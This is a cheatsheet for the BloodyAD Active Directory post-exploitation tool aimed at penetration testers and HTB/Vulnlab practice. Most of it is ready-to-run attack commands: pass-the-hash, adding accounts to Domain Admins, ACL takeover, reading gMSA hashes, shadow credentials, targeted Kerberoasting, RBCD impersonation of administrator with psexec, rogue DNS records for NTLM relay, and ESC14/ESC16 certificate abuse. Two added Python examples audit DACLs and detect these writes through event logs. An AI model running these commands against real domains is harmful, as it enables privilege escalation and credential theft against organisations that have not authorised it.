BloodyAD & Advanced Tooling
BloodyAD is a versatile Active Directory privilege escalation and post-exploitation tool. It communicates directly via LDAP, making it faster and stealthier than tools that rely on RPC or WMI. This cheatsheet covers every major operation with ready-to-use commands.
1. BloodyAD Overview
BloodyAD automates common AD attack operations that would otherwise require multiple tools (ldapmodify, PowerView, SharpAD, etc.). It is particularly useful for:
- ACL abuse (GenericAll, WriteOwner, WriteDACL)
- Object attribute modification (SPN, UPN, delegation flags)
- Shadow Credentials attacks
- RBCD configuration
- gMSA password reading
- Machine account manipulation
- DNS record management
When to use BloodyAD over other tools:
| Scenario | BloodyAD | Alternative |
|---|---|---|
| ACL abuse from Linux | Best choice | PowerView (Windows only) |
| Shadow Credentials | Works, simpler syntax | pywhisker |
| RBCD setup | One command | impacket-rbcd |
| gMSA password reading | Built-in | gMSADumper, nxc |
| SPN manipulation | Built-in | targetedKerberoast |
| DNS record creation | Built-in | dnstool.py |
| Pass-the-hash operations | Native support (-p :<hash>) | Most tools support PTH |
2. Authentication Options
BloodyAD supports three authentication methods. All commands in this cheatsheet use placeholders (DC_IP, DOMAIN, USER, PASS, TARGET_USER, and so on); replace them with your actual values.
Password Authentication
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASSWORD' <command>
Pass-the-Hash
Use the -p :<hash> format (colon prefix before the NT hash).
bloodyAD --host DC_IP -d DOMAIN -u USER -p ':NTHASH' <command>
Tip: The colon before the hash is mandatory. Without it, BloodyAD treats the hash as a literal password.
Kerberos Authentication
bloodyAD --host DC_IP -d DOMAIN -u USER -k <command>
You can specify the hash format with -f:
bloodyAD --host DC_IP -d DOMAIN -u USER -p ':NTHASH' -f rc4 <command>
3. Information Gathering
Get Object Properties
Retrieve all properties of an AD object (user, computer, group).
# Full object dump
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get object TARGET_USER
# Specific attribute
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get object TARGET_USER --attr userPrincipalName
# Get group membership
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get object TARGET_USER --attr memberOf
Get Children Objects
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get children 'OU=Users,DC=domain,DC=local'
Find Writable Attributes
Identify which attributes you can modify on objects -- critical for finding attack paths.
# Find all writable attributes
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get writable --detail
Search Operations
# General search (use -h to see all search options)
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get search -h
# Search with extended controls (e.g., show tombstoned/deleted objects)
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' -k get search \
-c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065
4. User Operations
Add User to Group
When you have GenericAll, GenericWrite, or WriteProperty on a group, add yourself or another user as a member.
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add groupMember 'Domain Admins' TARGET_USER
Change Password
Requires GenericAll or ResetPassword on the target user.
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' set password TARGET_USER 'NewPassword123!'
Enable a Disabled Account
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' remove uac TARGET_USER -f ACCOUNTDISABLE
Disable an Account
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add uac TARGET_USER -f ACCOUNTDISABLE
5. ACL Abuse with BloodyAD
GenericAll
Grant full control over a target object. Use this when you have WriteDACL on the target.
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add genericAll \
'CN=TARGET_USER,CN=Users,DC=domain,DC=local' ATTACKER_USER
Tip: GenericAll on a group object controls the group itself (add/remove members, change properties) but does NOT grant GenericAll on the group's members. These are separate permissions.
WriteOwner
Take ownership of an object. Once you own it, you can grant yourself any permissions.
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' set owner TARGET_GROUP ATTACKER_USER
After becoming owner, grant yourself GenericAll:
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add genericAll \
'CN=TARGET_GROUP,CN=Users,DC=domain,DC=local' ATTACKER_USER
WriteDACL
When you have WriteDACL, add any ACE you need.
# Grant GenericAll via WriteDACL
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add genericAll \
'CN=TARGET,CN=Users,DC=domain,DC=local' ATTACKER_USER
6. gMSA Password Reading
Group Managed Service Accounts (gMSA) have auto-rotating passwords stored in the msDS-ManagedPassword attribute. If your user is in the PrincipalsAllowedToRetrieveManagedPassword list, you can read it.
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get object 'GMSA_ACCOUNT$' \
--attr msDS-ManagedPassword
The output contains the NT hash that can be used directly for pass-the-hash:
# Use the extracted hash
nxc smb DC_IP -u 'GMSA_ACCOUNT$' -H NTHASH
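The rights abused in section 5 and the retrieval list read in section 6 both live in security descriptors, so the defensive counterpart is to audit those descriptors. The following Python is an added example, not code from this cheatsheet or from BloodyAD: it parses the DACL of an SDDL string, flags allow ACEs that give a non-trusted principal GenericAll, GenericWrite, WriteOwner, WriteDACL or WriteProperty, resolves a few attribute GUIDs to the attributes this page targets, and lists who may retrieve a gMSA password from a constructed msDS-GroupMSAMembership descriptor. The SDDL strings and SIDs are constructed, the TRUSTED_PRINCIPALS set is an assumption to tune per environment, and the attribute GUIDs are the schemaIDGUIDs from the AD schema.

```python
import re

# Two-letter SDDL access-right codes (MS-DTYP 2.5.1.2) that hand over control of an AD object
RISKY_RIGHT_CODES = {
    "GA": "GenericAll",
    "GW": "GenericWrite",
    "WO": "WriteOwner",
    "WD": "WriteDACL",
    "WP": "WriteProperty",
}
# The same rights as ACCESS_MASK bits, for ACEs whose rights field is a hex mask
RISKY_RIGHT_BITS = {
    "GenericAll": 0x10000000,
    "GenericWrite": 0x40000000,
    "WriteOwner": 0x00080000,
    "WriteDACL": 0x00040000,
    "WriteProperty": 0x00000020,
}
# schemaIDGUIDs of attributes whose WriteProperty maps to a technique on this page
ATTRIBUTE_GUIDS = {
    "f3a64788-5306-11d1-a9c5-0000f80367c1": "servicePrincipalName",
    "3f78c3e5-f79a-46bd-a0b8-9d18116ddc79": "msDS-AllowedToActOnBehalfOfOtherIdentity",
    "5b47d60f-6090-40b2-9f37-2a4de88f3063": "msDS-KeyCredentialLink",
}
# Assumed set of SDDL aliases for principals expected to hold these rights; tune per environment
TRUSTED_PRINCIPALS = {"DA", "EA", "BA", "SY", "CO"}

ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_dacl(sddl):
    """Return the ACEs in the DACL component of an SDDL string as dicts."""
    # SDDL components appear in the order O: G: D: S:; the DACL ends where a SACL starts
    if "D:" not in sddl:
        return []
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]
    aces = []
    for match in ACE_RE.finditer(dacl):
        fields = match.group(1).split(";")
        if len(fields) < 6:
            continue  # malformed ACE: skip rather than guess
        ace_type, flags, rights, object_guid, inherit_guid, trustee = fields[:6]
        aces.append({"type": ace_type, "flags": flags, "rights": rights,
                     "object_guid": object_guid.lower(), "trustee": trustee})
    return aces


def decode_rights(rights):
    """Map an SDDL rights field (two-letter codes or a 0x mask) to the risky right names it contains."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return {name for name, bit in RISKY_RIGHT_BITS.items() if mask & bit}
    codes = [rights[i:i + 2] for i in range(0, len(rights), 2)]
    return {RISKY_RIGHT_CODES[c] for c in codes if c in RISKY_RIGHT_CODES}


def find_risky_aces(sddl, trusted=TRUSTED_PRINCIPALS):
    """List allow ACEs that give a non-trusted principal one of the rights abused in section 5."""
    findings = []
    for ace in parse_dacl(sddl):
        if ace["type"] not in ("A", "OA"):  # only allow ACEs grant anything
            continue
        if ace["trustee"] in trusted:
            continue
        rights = decode_rights(ace["rights"])
        if not rights:
            continue
        # An object ACE (OA) scopes WriteProperty to one attribute; a plain ACE covers all attributes
        attribute = ATTRIBUTE_GUIDS.get(ace["object_guid"], ace["object_guid"] or None)
        findings.append({"trustee": ace["trustee"], "rights": sorted(rights), "attribute": attribute})
    return findings


def gmsa_password_readers(sddl):
    """Trustees of every allow ACE in an msDS-GroupMSAMembership descriptor (section 6)."""
    return sorted({ace["trustee"] for ace in parse_dacl(sddl) if ace["type"] in ("A", "OA")})


# Constructed descriptor for a user object; SIDs are fictitious
SAMPLE_USER_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;GA;;;DA)"                                        # Domain Admins: expected
    "(A;;RPWPCRLCLOCC;;;S-1-5-21-1111-2222-3333-1105)"    # WriteProperty on all attributes
    "(A;;WDWO;;;S-1-5-21-1111-2222-3333-1106)"            # WriteDACL + WriteOwner
    "(OA;;WP;f3a64788-5306-11d1-a9c5-0000f80367c1;;S-1-5-21-1111-2222-3333-1107)"  # WriteSPN only
    "(A;;GA;;;SY)"
)
# Constructed msDS-GroupMSAMembership descriptor: two principals may retrieve the gMSA password
SAMPLE_GMSA_SDDL = ("O:SYD:(A;;0xf01ff;;;S-1-5-21-1111-2222-3333-1108)"
                    "(A;;0xf01ff;;;S-1-5-21-1111-2222-3333-1109)")

if __name__ == "__main__":
    for finding in find_risky_aces(SAMPLE_USER_SDDL):
        print(finding)
    print("gMSA password readers:", gmsa_password_readers(SAMPLE_GMSA_SDDL))
```

The SDDL input would come from the object's nTSecurityDescriptor (or, for section 6, the gMSA's msDS-GroupMSAMembership) converted to SDDL with whatever LDAP client you use. Every finding is a principal that could run the section 5 commands against that object, and every listed reader is an account whose compromise exposes the gMSA hash exactly as section 6 shows.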
7. Machine Account Operations
Check MachineAccountQuota
The default MAQ is 10, allowing any domain user to create up to 10 computer accounts.
# Check current quota
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get object \
'DC=domain,DC=local' --attr ms-DS-MachineAccountQuota
Create a Machine Account
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add computer NEWPC$ 'ComputerPass123!'
Modify MachineAccountQuota
Requires write access to the domain root object.
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' set object \
'DC=domain,DC=local' ms-DS-MachineAccountQuota -v 10
8. Shadow Credentials
Add a Key Credential to a target object's msDS-KeyCredentialLink attribute. This allows authentication as that object using certificate-based auth (PKINIT).
Prerequisites: PKINIT must be available (AD CS enrolled or the Key Trust model configured), and the target must be a user or computer object.
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add shadowCredentials TARGET_USER
After adding the shadow credential, authenticate using the generated certificate:
# Use certipy or PKINITtools to get a TGT from the shadow credential
certipy auth -pfx shadow.pfx -dc-ip DC_IP
9. SPN Operations (WriteSPN)
Setting an SPN on a user account enables Kerberoasting. Use this when you have GenericAll or GenericWrite on a target user.
# Set an arbitrary SPN
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' set object TARGET_USER \
servicePrincipalName -v 'HTTP/attacker.domain.local'
Then Kerberoast the target:
impacket-GetUserSPNs DOMAIN/USER:PASS -dc-ip DC_IP -request-user TARGET_USER
Clean up after cracking:
# Remove the SPN (if you have write access)
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' set object TARGET_USER \
servicePrincipalName -v ''
Tip: WriteSPN is a common BloodHound edge. Always check if target users have Kerberos pre-authentication disabled -- if so, AS-REP roasting is simpler and does not require setting an SPN.
10. RBCD Configuration
Resource-Based Constrained Delegation allows a machine you control to impersonate any user to a target service.
Prerequisites: Write access to the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute + a computer account you control.
# Step 1: Create a machine account (if needed)
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add computer EVIL$ 'Pass123!'
# Step 2: Configure RBCD -- allow EVIL$ to delegate to TARGET$
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add rbcd 'TARGET$' 'EVIL$'
Then request a service ticket via S4U:
# Step 3: Get a service ticket impersonating administrator
impacket-getST -spn cifs/TARGET.domain.local -impersonate administrator \
-dc-ip DC_IP 'DOMAIN/EVIL$:Pass123!'
# Step 4: Use the ticket
export KRB5CCNAME=administrator@cifs_TARGET.domain.local@DOMAIN.LOCAL.ccache
impacket-psexec -k -no-pass TARGET.domain.local
11. DNS Record Management
Add DNS records pointing to your attacker IP. Useful for MITM attacks, NTLM relay, or redirecting traffic.
# Add a DNS A record
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add dnsRecord RECORD_NAME ATTACKER_IP
Tip: Any authenticated domain user can create DNS records by default (ADIDNS). This is useful for NTLM relay setups where you need victims to resolve a hostname to your IP.
12. UPN and Email Modification
Modify UserPrincipalName (UPN)
UPN modification is critical in attacks like ESC16 (ADCS) where you set a target's UPN before requesting a certificate.
# Set UPN
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' set object TARGET_USER \
userPrincipalName -v 'administrator@domain.local'
# Verify the change
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get object TARGET_USER \
--attr userPrincipalName
Tip: For ESC16, always restore the original UPN after obtaining the certificate, before running certipy auth. Failure to restore causes authentication to fail.
Modify Email Address
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' set object TARGET_USER \
mail -v 'attacker@domain.local'
13. Delegation Flags
Add TRUSTED_TO_AUTH_FOR_DELEGATION
Enables constrained delegation with protocol transition (S4U2Self + S4U2Proxy).
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add uac TARGET_USER \
-f TRUSTED_TO_AUTH_FOR_DELEGATION
Add TRUSTED_FOR_DELEGATION (Unconstrained)
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' add uac TARGET_COMPUTER \
-f TRUSTED_FOR_DELEGATION
Remove Delegation Flags
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' remove uac TARGET_USER \
-f TRUSTED_TO_AUTH_FOR_DELEGATION
14. altSecurityIdentities Modification
The altSecurityIdentities attribute maps certificates to AD objects. Modifying it enables certificate-based authentication abuse (ESC14).
# Set altSecurityIdentities for ESC14B
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' set object TARGET_USER \
altSecurityIdentities -v 'X509:<RFC822>attacker@domain.local'
After modification, request a certificate with the matching email and authenticate as the target user.
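Every technique in sections 7 through 14 is a write to one well-known attribute, which is what makes them detectable: Directory Service Changes auditing logs each write as Event ID 5136 (with AttributeLDAPDisplayName, AttributeValue and an OperationType of Value Added or Value Deleted), and a new computer account as Event ID 4741. The Python below is an added example, not code from this cheatsheet or from BloodyAD: it maps those events to the sections of this page, decodes userAccountControl changes into the delegation flags of section 13, and suppresses the one routine case of a computer account rewriting its own SPNs. The events, account names and DNs are constructed; the helper ev5136 and the placeholder blob values are assumptions for the sample.

```python
# Event 5136 OperationType codes
VALUE_ADDED = "%%14674"
VALUE_DELETED = "%%14675"

# Attribute written by each technique in sections 7-14, keyed by LDAP display name
WATCHED_ATTRIBUTES = {
    "ms-DS-MachineAccountQuota": "MachineAccountQuota change (section 7)",
    "msDS-KeyCredentialLink": "Shadow Credentials (section 8)",
    "servicePrincipalName": "SPN write for targeted Kerberoasting (section 9)",
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "RBCD configuration (section 10)",
    "dnsRecord": "ADIDNS record change (section 11)",
    "userPrincipalName": "UPN manipulation, e.g. ESC16 (section 12)",
    "userAccountControl": "userAccountControl flag change (sections 4 and 13)",
    "altSecurityIdentities": "certificate mapping for ESC14 (section 14)",
}

# userAccountControl bits named on this page
UAC_FLAGS = {
    0x0000002: "ACCOUNTDISABLE",
    0x0080000: "TRUSTED_FOR_DELEGATION",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}


def uac_flags(value):
    """Decode the decimal userAccountControl string carried by the event into flag names."""
    mask = int(value)
    return {name for bit, name in UAC_FLAGS.items() if mask & bit}


def rdn_name(dn):
    """'CN=FILESRV,OU=Servers,DC=domain,DC=local' -> 'FILESRV'"""
    return dn.split(",", 1)[0].split("=", 1)[1]


def analyze(events):
    """Return one alert per event that matches a technique on this page."""
    alerts = []
    previous_uac = {}  # ObjectDN -> old value from the Value Deleted record that precedes the Value Added one
    for ev in events:
        if ev["EventID"] == 4741:
            alerts.append({"actor": ev["SubjectUserName"], "object": ev["TargetUserName"],
                           "technique": "machine account creation (section 7)",
                           "detail": f"computer account created by {ev['SubjectUserName']}"})
            continue
        if ev["EventID"] != 5136 or ev["AttributeLDAPDisplayName"] not in WATCHED_ATTRIBUTES:
            continue
        attr, actor, dn = ev["AttributeLDAPDisplayName"], ev["SubjectUserName"], ev["ObjectDN"]
        # A computer account rewriting its own SPNs is routine; suppress only that case
        if attr == "servicePrincipalName" and actor.rstrip("$").lower() == rdn_name(dn).lower():
            continue
        if attr == "userAccountControl":
            if ev["OperationType"] == VALUE_DELETED:
                previous_uac[dn] = ev["AttributeValue"]
                continue
            added = uac_flags(ev["AttributeValue"]) - uac_flags(previous_uac.pop(dn, "0"))
            if not added:
                continue
            detail = "flags added: " + ", ".join(sorted(added))
        else:
            action = "added" if ev["OperationType"] == VALUE_ADDED else "removed"
            detail = f"{attr} {action}: {ev['AttributeValue']}"
        alerts.append({"actor": actor, "object": dn, "technique": WATCHED_ATTRIBUTES[attr], "detail": detail})
    return alerts


def ev5136(actor, dn, attr, value, op=VALUE_ADDED):
    """Build a constructed 5136 record with the fields the analysis reads (assumed helper)."""
    return {"EventID": 5136, "SubjectUserName": actor, "ObjectDN": dn,
            "AttributeLDAPDisplayName": attr, "AttributeValue": value, "OperationType": op}


USER_DN = "CN=svc_backup,CN=Users,DC=domain,DC=local"
SRV_DN = "CN=FILESRV,OU=Servers,DC=domain,DC=local"

# Constructed event stream; blob values are placeholders, not real attribute data
SAMPLE_EVENTS = [
    ev5136("jdoe", USER_DN, "msDS-KeyCredentialLink", "B:828:<keycredential-blob>:" + USER_DN),
    ev5136("jdoe", USER_DN, "description", "Backup service"),                          # not watched
    ev5136("FILESRV$", SRV_DN, "servicePrincipalName", "HOST/filesrv.domain.local"),  # self-update, suppressed
    ev5136("jdoe", SRV_DN, "msDS-AllowedToActOnBehalfOfOtherIdentity", "<security-descriptor-blob>"),
    ev5136("jdoe", USER_DN, "userAccountControl", "512", VALUE_DELETED),
    ev5136("jdoe", USER_DN, "userAccountControl", "16777728", VALUE_ADDED),  # 512 | 0x1000000
    {"EventID": 4741, "SubjectUserName": "jdoe", "TargetUserName": "EVIL$"},
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

Event 5136 is only generated when the Directory Service Changes audit subcategory is enabled and the objects carry an auditing SACL, so verify both before relying on this; without them the writes in sections 8 to 14 leave no log entry at all. The userAccountControl handling pairs the Value Deleted record with the Value Added record that follows it, which is how the DC logs a single attribute replacement.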
15. Deleted Objects Recovery
BloodyAD can enumerate and restore deleted (tombstoned) AD objects, which may contain sensitive data or previously privileged accounts.
Find Deleted Objects
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' get writable --include-del
Search Tombstoned Objects with Extended Controls
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' -k get search \
-c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065
Restore a Deleted Object
bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS' -k set restore TARGET_USER
Tip: Tombstoned objects retain most of their attributes (including group memberships) for the tombstone lifetime (default 180 days). Restoring a deleted admin account can be a quick path to domain admin.
16. Quick Reference Table
All commands use the base syntax: bloodyAD --host DC_IP -d DOMAIN -u USER -p 'PASS'
| Operation | Command |
|---|---|
| Get object info | get object TARGET |
| Get specific attribute | get object TARGET --attr ATTR |
| Find writable attributes | get writable --detail |
| Add user to group | add groupMember GROUP USER |
| Change password | set password TARGET 'NEWPASS' |
| Enable disabled account | remove uac TARGET -f ACCOUNTDISABLE |
| Grant GenericAll | add genericAll DN TARGET |
| Set owner | set owner TARGET ATTACKER |
| Read gMSA password | get object 'GMSA$' --attr msDS-ManagedPassword |
| Create machine account | add computer NAME$ PASS |
| Check MAQ | get object 'DC=d,DC=l' --attr ms-DS-MachineAccountQuota |
| Add Shadow Credential | add shadowCredentials TARGET |
| Set SPN | set object TARGET servicePrincipalName -v 'SPN' |
| Configure RBCD | add rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$' |
| Add DNS record | add dnsRecord NAME IP |
| Modify UPN | set object TARGET userPrincipalName -v 'UPN' |
| Modify email | set object TARGET mail -v 'EMAIL' |
| Add delegation flag | add uac TARGET -f TRUSTED_TO_AUTH_FOR_DELEGATION |
| Remove delegation flag | remove uac TARGET -f FLAG |
| Set altSecurityIdentities | set object TARGET altSecurityIdentities -v 'VALUE' |
| Find deleted objects | get writable --include-del |
| Restore deleted object | set restore TARGET |
| Search with controls | get search -c OID |
Authentication Flags
| Flag | Purpose |
|---|---|
| -p 'PASSWORD' | Password authentication |
| -p ':NTHASH' | Pass-the-hash (colon prefix required) |
| -k | Kerberos authentication |
| -f rc4 | Specify hash format |
Complementary Tools
BloodyAD covers many operations, but some attacks require specialized tools. Here is when to reach for alternatives:
| Task | Tool | Notes |
|---|---|---|
| ADCS enumeration and exploitation | certipy | ESC1-ESC16, certificate auth |
| BloodHound data collection | bloodhound-python | Relationship mapping |
| SMB operations + spraying | nxc (netexec) | Broader protocol support |
| Kerberos attacks | impacket | GetUserSPNs, getST, getTGT |
| NTLM relay | impacket-ntlmrelayx | Relay to LDAP, SMB, MSSQL, HTTP |
| Coercion | PetitPotam, Coercer | Force authentication |
| WinRM shell | evil-winrm | Interactive PowerShell |
| LDAP queries | ldapsearch | Raw LDAP when BloodyAD is unavailable |
Machines to Practice
These HTB and Vulnlab machines feature heavy BloodyAD usage:
- Vintage (HTB) -- bloodyAD PTH, group manipulation
- Rebound (HTB) -- ACL abuse chain
- Certified (HTB) -- ADCS + ACL abuse
- TombWatcher (HTB) -- Shadow Credentials, delegation
- Absolute (HTB) -- Kerberos-only environment
- Redelegate (Vulnlab) -- Delegation attacks